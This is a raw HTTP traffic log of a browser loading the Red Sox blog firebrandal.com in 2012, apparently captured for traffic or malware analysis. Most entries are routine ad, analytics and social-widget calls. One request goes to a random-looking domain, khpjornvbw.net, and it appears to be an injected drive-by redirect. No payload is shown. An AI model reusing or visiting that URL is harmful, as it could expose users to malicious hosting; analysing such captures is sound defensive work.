P3P: CP=&quot;CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE&quot;
Cache-Control: max-age=2419175
Date: Mon, 05 Nov 2012 17:00:40 GMT
Connection: keep-alive
GET /i/teamlogos/mlb/sml/trans/bos.gif HTTP/1.1

Host: a.espncdn.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://espn.go.com/mlb/sweetspot/localMod?site=firebrand
HTTP/1.1 200 OK

Content-Type: image/gif
Last-Modified: Tue, 17 Apr 2012 20:10:58 GMT
Content-Length: 1741
Accept-Ranges: bytes
P3P: CP=&quot;CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE&quot;
Cache-Control: max-age=1118206
Date: Mon, 05 Nov 2012 17:00:40 GMT
Connection: keep-alive
GET /quant.js HTTP/1.1

Host: edge.quantserve.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
Cookie: mc=5097f0b3-cc687-bcba5-79870
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Server: Apache
Last-Modified: Mon, 25 Jun 2012 19:57:36 GMT
Accept-Ranges: bytes
Content-Length: 2307
Vary: Accept-Encoding
Content-Encoding: gzip
Cache-Control: private, max-age=86400
Expires: Tue, 06 Nov 2012 17:00:40 GMT
Date: Mon, 05 Nov 2012 17:00:40 GMT
Connection: keep-alive
GET /share4x/index.63ea568555d3d23c14e63b0226e3adda.html HTTP/1.1

Host: edge.sharethis.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
Cookie: __uset=yes; __stid=CsFej1CX8Le4CAQ61FPIAg==
HTTP/1.1 200 OK

Content-Type: text/html
Server: nginx/1.0.15
Content-Encoding: gzip
Content-Length: 2440
Vary: Accept-Encoding
Cache-Control: max-age=970606
Expires: Fri, 16 Nov 2012 22:37:27 GMT
Date: Mon, 05 Nov 2012 17:00:41 GMT
Connection: keep-alive
GET /images/check-big.png HTTP/1.1

Host: w.sharethis.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
Cookie: __uset=yes; __stid=CsFej1CX8Le4CAQ61FPIAg==
HTTP/1.1 200 OK

Content-Type: image/png
Server: nginx/0.8.53
Content-Length: 1829
Expires: Tue, 05 Nov 2013 16:35:25 GMT
Cache-Control: max-age=31536000
Accept-Ranges: bytes
Date: Mon, 05 Nov 2012 17:00:41 GMT
Connection: keep-alive
GET /button/css/buttons.f48d075cabb93f026d23cf2c20db30d0.css HTTP/1.1

Host: w.sharethis.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
Cookie: __uset=yes; __stid=CsFej1CX8Le4CAQ61FPIAg==
HTTP/1.1 200 OK

Content-Type: text/css
Server: nginx/0.8.53
Expires: Tue, 05 Nov 2013 16:35:40 GMT
Cache-Control: max-age=31536000
Content-Encoding: gzip
Content-Length: 3853
Date: Mon, 05 Nov 2012 17:00:41 GMT
Connection: keep-alive
Vary: Accept-Encoding
GET /images/check-small.png HTTP/1.1

Host: w.sharethis.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
Cookie: __uset=yes; __stid=CsFej1CX8Le4CAQ61FPIAg==
HTTP/1.1 200 OK

Content-Type: image/png
Server: nginx/0.8.53
Content-Length: 1460
Expires: Tue, 05 Nov 2013 16:39:49 GMT
Cache-Control: max-age=31536000
Accept-Ranges: bytes
Date: Mon, 05 Nov 2012 17:00:41 GMT
Connection: keep-alive
GET /__utm.gif?utmwv=5.3.7&utms=1&utmn=1529416848&utmhn=a2a.lockerz.com&utmcs=ISO-8859-1&utmsr=1176x885&utmvp=1x1&utmsc=24-bit&utmul=en-us&utmje=1&utmfl=10.0%20r45&utmhid=1217777690&utmr=http%3A%2F%2Ffirebrandal.com%2F&utmp=%2Fmenu%2Fsm9.html&utmac=UA-1244922-8&utmcc=__utma%3D132044255.270862409.1352134841.1352134841.1352134841.1%3B%2B__utmz%3D132044255.1352134841.1.1.utmcsr%3Dfirebrandal.com%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2F%3B&utmu=D~ HTTP/1.1

Host: www.google-analytics.com
GET /__utm.gif?utmwv=5.3.7&amp;utms=1&amp;utmn=1529416848&amp;utmhn=a2a.lockerz.com&amp;utmcs=ISO-8859-1&amp;utmsr=1176x885&amp;utmvp=1x1&amp;utmsc=24-bit&amp;utmul=en-us&amp;utmje=1&amp;utmfl=10.0%20r45&amp;utmhid=1217777690&amp;utmr=http%3A%2F%2Ffirebrandal.com%2F&amp;utmp=%2Fmenu%2Fsm9.html&amp;utmac=UA-1244922-8&amp;utmcc=__utma%3D132044255.270862409.1352134841.1352134841.1352134841.1%3B%2B__utmz%3D132044255.1352134841.1.1.utmcsr%3Dfirebrandal.com%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2F%3B&amp;utmu=D~ HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://a2a.lockerz.com/menu/sm9.html
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Thu, 01 Nov 2012 01:29:28 GMT
Content-Length: 35
X-Content-Type-Options: nosniff
Pragma: no-cache
Expires: Wed, 19 Apr 2000 11:43:00 GMT
Last-Modified: Wed, 21 Jan 2004 19:51:30 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Age: 401473
Server: GFE/2.0
GET /__utm.gif?utmwv=5.3.7&utms=2&utmn=69042917&utmhn=a2a.lockerz.com&utmcs=ISO-8859-1&utmsr=1176x885&utmvp=1x1&utmsc=24-bit&utmul=en-us&utmje=1&utmfl=10.0%20r45&utmhid=1217777690&utmr=http%3A%2F%2Ffirebrandal.com%2F&utmp=%2Fmenu%2Fsm9.html&utmac=UA-8356268-11&utmcc=__utma%3D132044255.270862409.1352134841.1352134841.1352134841.1%3B%2B__utmz%3D132044255.1352134841.1.1.utmcsr%3Dfirebrandal.com%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2F%3B&utmu=D~ HTTP/1.1

Host: www.google-analytics.com
GET /__utm.gif?utmwv=5.3.7&amp;utms=2&amp;utmn=69042917&amp;utmhn=a2a.lockerz.com&amp;utmcs=ISO-8859-1&amp;utmsr=1176x885&amp;utmvp=1x1&amp;utmsc=24-bit&amp;utmul=en-us&amp;utmje=1&amp;utmfl=10.0%20r45&amp;utmhid=1217777690&amp;utmr=http%3A%2F%2Ffirebrandal.com%2F&amp;utmp=%2Fmenu%2Fsm9.html&amp;utmac=UA-8356268-11&amp;utmcc=__utma%3D132044255.270862409.1352134841.1352134841.1352134841.1%3B%2B__utmz%3D132044255.1352134841.1.1.utmcsr%3Dfirebrandal.com%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2F%3B&amp;utmu=D~ HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://a2a.lockerz.com/menu/sm9.html
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Thu, 01 Nov 2012 01:30:59 GMT
Content-Length: 35
X-Content-Type-Options: nosniff
Pragma: no-cache
Expires: Wed, 19 Apr 2000 11:43:00 GMT
Last-Modified: Wed, 21 Jan 2004 19:51:30 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Age: 401382
Server: GFE/2.0
GET /links/majority_last_submitting.php HTTP/1.1

Host: khpjornvbw.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: text/html
Server: nginx/1.2.4
Date: Mon, 05 Nov 2012 16:59:55 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Content-Encoding: gzip
GET /pixel;r=1078183649;a.1=p-94D6e1NDscLvI;labels.1=comment-links;a.2=p-18-mFEk4J448M;labels.2=type.intensedebate.embed;fpan=1;fpa=P0-2301010-1352134841207;ns=0;ce=1;je=1;sr=1176x885x24;enc=n;dst=1;et=1352134841206;tzo=-60;ref=;url=http%3A%2F%2Ffirebrandal.com%2F;ogl= HTTP/1.1

Host: pixel.quantserve.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
Cookie: mc=5097f0b3-cc687-bcba5-79870
HTTP/1.1 200 OK

Content-Type: image/gif
Connection: close
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 35
Date: Mon, 05 Nov 2012 17:00:41 GMT
Server: QS
GET /plugins/like.php?api_key=233237476726965&locale=en_US&sdk=joey&channel_url=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D12%23cb%3Df51f71b09b96fe%26origin%3Dhttp%253A%252F%252Ffirebrandal.com%252Ffc49925b02da48%26domain%3Dfirebrandal.com%26relation%3Dparent.parent&href=http%3A%2F%2Ffirebrandal.com%2F2012%2F11%2F02%2F21012%2F&node_type=link&width=90&layout=button_count&colorscheme=light&show_faces=false&send=false&extended_social_context=false HTTP/1.1

Host: www.facebook.com
GET /plugins/like.php?api_key=233237476726965&amp;locale=en_US&amp;sdk=joey&amp;channel_url=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D12%23cb%3Df51f71b09b96fe%26origin%3Dhttp%253A%252F%252Ffirebrandal.com%252Ffc49925b02da48%26domain%3Dfirebrandal.com%26relation%3Dparent.parent&amp;href=http%3A%2F%2Ffirebrandal.com%2F2012%2F11%2F02%2F21012%2F&amp;node_type=link&amp;width=90&amp;layout=button_count&amp;colorscheme=light&amp;show_faces=false&amp;send=false&amp;extended_social_context=false HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Content-Encoding: gzip
X-FB-Debug: dFIUO9e/0BAdgY7eL3yl8ZBUYh0vu2S8fK69FPEorjw=
Date: Mon, 05 Nov 2012 17:00:41 GMT
Transfer-Encoding: chunked
Connection: keep-alive
POST / HTTP/1.1

Host: ocsp.verisign.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 115
Content-Type: application/ocsp-request
HTTP/1.0 200 Ok

Content-Type: application/ocsp-response
Last-Modified: Sat, 03 Nov 2012 04:37:48 GMT
Expires: Sat, 10 Nov 2012 04:37:48 GMT
Content-Transfer-Encoding: binary
Content-Length: 1814
Cache-Control: max-age=387427, public, no-transform, must-revalidate
Date: Mon, 05 Nov 2012 17:00:41 GMT
nncoection: close
Connection: Keep-Alive
GET /plugins/like.php?api_key=233237476726965&locale=en_US&sdk=joey&channel_url=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D12%23cb%3Df1ee025f864e51a%26origin%3Dhttp%253A%252F%252Ffirebrandal.com%252Ffc49925b02da48%26domain%3Dfirebrandal.com%26relation%3Dparent.parent&href=http%3A%2F%2Ffirebrandal.com%2F2012%2F11%2F02%2Fpoll-biggest-offseason-priority%2F&node_type=link&width=90&layout=button_count&colorscheme=light&show_faces=false&send=false&extended_social_context=false HTTP/1.1

Host: www.facebook.com
GET /plugins/like.php?api_key=233237476726965&amp;locale=en_US&amp;sdk=joey&amp;channel_url=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D12%23cb%3Df1ee025f864e51a%26origin%3Dhttp%253A%252F%252Ffirebrandal.com%252Ffc49925b02da48%26domain%3Dfirebrandal.com%26relation%3Dparent.parent&amp;href=http%3A%2F%2Ffirebrandal.com%2F2012%2F11%2F02%2Fpoll-biggest-offseason-priority%2F&amp;node_type=link&amp;width=90&amp;layout=button_count&amp;colorscheme=light&amp;show_faces=false&amp;send=false&amp;extended_social_context=false HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Content-Encoding: gzip
X-FB-Debug: 3E2sZQt82Pd2BJXfVvcNkyTbByCWkiEDNzEtdlRyp+0=
Date: Mon, 05 Nov 2012 17:00:41 GMT
Transfer-Encoding: chunked
Connection: keep-alive
GET /plugins/like.php?api_key=233237476726965&locale=en_US&sdk=joey&channel_url=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D12%23cb%3Df162ea8628fe03%26origin%3Dhttp%253A%252F%252Ffirebrandal.com%252Ffc49925b02da48%26domain%3Dfirebrandal.com%26relation%3Dparent.parent&href=http%3A%2F%2Ffirebrandal.com%2F2012%2F10%2F25%2Fepisode-133-where-we-welcome-back-john-fn-farrell%2F&node_type=link&width=90&layout=button_count&colorscheme=light&show_faces=false&send=false&extended_social_context=false HTTP/1.1

Host: www.facebook.com
GET /plugins/like.php?api_key=233237476726965&amp;locale=en_US&amp;sdk=joey&amp;channel_url=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D12%23cb%3Df162ea8628fe03%26origin%3Dhttp%253A%252F%252Ffirebrandal.com%252Ffc49925b02da48%26domain%3Dfirebrandal.com%26relation%3Dparent.parent&amp;href=http%3A%2F%2Ffirebrandal.com%2F2012%2F10%2F25%2Fepisode-133-where-we-welcome-back-john-fn-farrell%2F&amp;node_type=link&amp;width=90&amp;layout=button_count&amp;colorscheme=light&amp;show_faces=false&amp;send=false&amp;extended_social_context=false HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Content-Encoding: gzip
X-FB-Debug: dezD2A3uSAVaw4zi8YJARNe1WdslzyG/zKAQrD0lb14=
Date: Mon, 05 Nov 2012 17:00:41 GMT
Transfer-Encoding: chunked
Connection: keep-alive
GET /plugins/like.php?api_key=233237476726965&locale=en_US&sdk=joey&channel_url=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D12%23cb%3Df1f91cf4a4fcad8%26origin%3Dhttp%253A%252F%252Ffirebrandal.com%252Ffc49925b02da48%26domain%3Dfirebrandal.com%26relation%3Dparent.parent&href=http%3A%2F%2Ffirebrandal.com%2F2012%2F11%2F01%2Fred-sox-after-dan-haren%2F&node_type=link&width=90&layout=button_count&colorscheme=light&show_faces=false&send=false&extended_social_context=false HTTP/1.1

Host: www.facebook.com
GET /plugins/like.php?api_key=233237476726965&amp;locale=en_US&amp;sdk=joey&amp;channel_url=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D12%23cb%3Df1f91cf4a4fcad8%26origin%3Dhttp%253A%252F%252Ffirebrandal.com%252Ffc49925b02da48%26domain%3Dfirebrandal.com%26relation%3Dparent.parent&amp;href=http%3A%2F%2Ffirebrandal.com%2F2012%2F11%2F01%2Fred-sox-after-dan-haren%2F&amp;node_type=link&amp;width=90&amp;layout=button_count&amp;colorscheme=light&amp;show_faces=false&amp;send=false&amp;extended_social_context=false HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Content-Encoding: gzip
X-FB-Debug: 7KydtVdAxPPrfhm4kMq2WY/cZK9rnTWtip5oObuMrhE=
Date: Mon, 05 Nov 2012 17:00:41 GMT
Transfer-Encoding: chunked
Connection: keep-alive
GET /plugins/like.php?api_key=233237476726965&locale=en_US&sdk=joey&channel_url=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D12%23cb%3Df3948726fa031b8%26origin%3Dhttp%253A%252F%252Ffirebrandal.com%252Ffc49925b02da48%26domain%3Dfirebrandal.com%26relation%3Dparent.parent&href=http%3A%2F%2Ffirebrandal.com%2F2012%2F10%2F31%2Frandom-musings%2F&node_type=link&width=90&layout=button_count&colorscheme=light&show_faces=false&send=false&extended_social_context=false HTTP/1.1

Host: www.facebook.com
GET /plugins/like.php?api_key=233237476726965&amp;locale=en_US&amp;sdk=joey&amp;channel_url=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D12%23cb%3Df3948726fa031b8%26origin%3Dhttp%253A%252F%252Ffirebrandal.com%252Ffc49925b02da48%26domain%3Dfirebrandal.com%26relation%3Dparent.parent&amp;href=http%3A%2F%2Ffirebrandal.com%2F2012%2F10%2F31%2Frandom-musings%2F&amp;node_type=link&amp;width=90&amp;layout=button_count&amp;colorscheme=light&amp;show_faces=false&amp;send=false&amp;extended_social_context=false HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Content-Encoding: gzip
X-FB-Debug: NEHlgwZE3nVDtVqhZ5mBca3EF1jNI9M56O5WyY5E2d8=
Date: Mon, 05 Nov 2012 17:00:41 GMT
Transfer-Encoding: chunked
Connection: keep-alive
GET /plugins/like.php?api_key=233237476726965&locale=en_US&sdk=joey&channel_url=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D12%23cb%3Df125d48a482de1%26origin%3Dhttp%253A%252F%252Ffirebrandal.com%252Ffc49925b02da48%26domain%3Dfirebrandal.com%26relation%3Dparent.parent&href=http%3A%2F%2Ffirebrandal.com%2F2012%2F10%2F31%2Fbogaerts-tabbed-top-red-sox-prospect%2F&node_type=link&width=90&layout=button_count&colorscheme=light&show_faces=false&send=false&extended_social_context=false HTTP/1.1

Host: www.facebook.com
GET /plugins/like.php?api_key=233237476726965&amp;locale=en_US&amp;sdk=joey&amp;channel_url=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D12%23cb%3Df125d48a482de1%26origin%3Dhttp%253A%252F%252Ffirebrandal.com%252Ffc49925b02da48%26domain%3Dfirebrandal.com%26relation%3Dparent.parent&amp;href=http%3A%2F%2Ffirebrandal.com%2F2012%2F10%2F31%2Fbogaerts-tabbed-top-red-sox-prospect%2F&amp;node_type=link&amp;width=90&amp;layout=button_count&amp;colorscheme=light&amp;show_faces=false&amp;send=false&amp;extended_social_context=false HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Content-Encoding: gzip
X-FB-Debug: fJwuE92dptj27GfK2AbwJPNUdQ3C0R3NGYsSw7u42b0=
Date: Mon, 05 Nov 2012 17:00:41 GMT
Transfer-Encoding: chunked
Connection: keep-alive
GET /plugins/like.php?api_key=233237476726965&locale=en_US&sdk=joey&channel_url=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D12%23cb%3Dfcb09c8d0fccf%26origin%3Dhttp%253A%252F%252Ffirebrandal.com%252Ffc49925b02da48%26domain%3Dfirebrandal.com%26relation%3Dparent.parent&href=http%3A%2F%2Ffirebrandal.com%2F2012%2F11%2F01%2Fits-time-for-a-free-agent-frenzy%2F&node_type=link&width=90&layout=button_count&colorscheme=light&show_faces=false&send=false&extended_social_context=false HTTP/1.1

Host: www.facebook.com
GET /plugins/like.php?api_key=233237476726965&amp;locale=en_US&amp;sdk=joey&amp;channel_url=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D12%23cb%3Dfcb09c8d0fccf%26origin%3Dhttp%253A%252F%252Ffirebrandal.com%252Ffc49925b02da48%26domain%3Dfirebrandal.com%26relation%3Dparent.parent&amp;href=http%3A%2F%2Ffirebrandal.com%2F2012%2F11%2F01%2Fits-time-for-a-free-agent-frenzy%2F&amp;node_type=link&amp;width=90&amp;layout=button_count&amp;colorscheme=light&amp;show_faces=false&amp;send=false&amp;extended_social_context=false HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Content-Encoding: gzip
X-FB-Debug: dbxSCNCSJ45nzVcsy9Y81OHY3YDTi6WsVDS1193dxNs=
Date: Mon, 05 Nov 2012 17:00:41 GMT
Transfer-Encoding: chunked
Connection: keep-alive
GET /plugins/like.php?api_key=233237476726965&locale=en_US&sdk=joey&channel_url=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D12%23cb%3Df37e9371f2571ae%26origin%3Dhttp%253A%252F%252Ffirebrandal.com%252Ffc49925b02da48%26domain%3Dfirebrandal.com%26relation%3Dparent.parent&href=http%3A%2F%2Ffirebrandal.com%2F2012%2F10%2F26%2Fa-contract-extension-for-jon-lester%2F&node_type=link&width=90&layout=button_count&colorscheme=light&show_faces=false&send=false&extended_social_context=false HTTP/1.1

Host: www.facebook.com
GET /plugins/like.php?api_key=233237476726965&amp;locale=en_US&amp;sdk=joey&amp;channel_url=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D12%23cb%3Df37e9371f2571ae%26origin%3Dhttp%253A%252F%252Ffirebrandal.com%252Ffc49925b02da48%26domain%3Dfirebrandal.com%26relation%3Dparent.parent&amp;href=http%3A%2F%2Ffirebrandal.com%2F2012%2F10%2F26%2Fa-contract-extension-for-jon-lester%2F&amp;node_type=link&amp;width=90&amp;layout=button_count&amp;colorscheme=light&amp;show_faces=false&amp;send=false&amp;extended_social_context=false HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Content-Encoding: gzip
